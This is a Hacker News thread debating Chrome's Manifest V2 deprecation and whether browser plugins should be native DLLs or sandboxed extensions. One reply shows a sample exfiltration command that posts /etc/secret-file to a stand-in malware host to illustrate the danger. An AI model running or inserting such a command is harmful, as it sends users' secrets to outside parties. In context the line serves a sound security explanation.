←back to thread

"Begin disabling installed extensions still using Manifest V2 in Chrome stable"

(developer.chrome.com)
552 points freedomben | 1 comments | 11 Oct 24 14:20 UTC | HN request time: 0s | source
Show context
est ◴[11 Oct 24 14:36 UTC] No.41809848[source]
Can't we avoid the Manifest bullshit altogether?

I remember how IE plugins roles: just dll inject into the process.

replies(4): >>41809886 #>>41810032 #>>41814087 #>>41825057 #
emestifs ◴[11 Oct 24 14:40 UTC] No.41809886[source]
Inject dll's from the internet right into the browser. Yes, let's!
replies(1): >>41810215 #
yjftsjthsd-h ◴[11 Oct 24 15:14 UTC] No.41810215[source]
I'm not convinced that this is a good idea, but I don't think that's the reason; don't all your dlls come from the internet?
replies(2): >>41810341 #>>41816218 #
emestifs ◴[11 Oct 24 15:26 UTC] No.41810341[source]
My comment was sarcasm.

The difference here is are you downloading a random dll from a well known source or from http://free-vpn-fast-internet.dwnloadfree.ru/free-chrome-vpn...? My mom isn't going to know the difference and will click the big green DOWNLOAD NOW button blindly.

replies(2): >>41810726 #>>41816205 #
yjftsjthsd-h ◴[11 Oct 24 16:06 UTC] No.41810726[source]
But that's not a difference, is it? Can't Windows enforce that DLLs have to be signed just like extensions?
replies(1): >>41812632 #
1. tredre3 ◴[11 Oct 24 19:21 UTC] No.41812632[source]
Injecting a DLL in the browser implies code running with the browser's permissions, which means the DLL will be able to access everything on your system. For example `system("curl https://malware.com -F@/etc/secret-file")` will be possible. Another example is that it could also see all your saved passwords.

A javascript extension cannot do that. It is sandboxed and is bound to a permission system limiting what it can do on top of that.

Signing a DLL only proves that the author is who he says he is. Not that his intentions are good. Same for browser extensions.

So it's best to limit what the extension can do to begin with.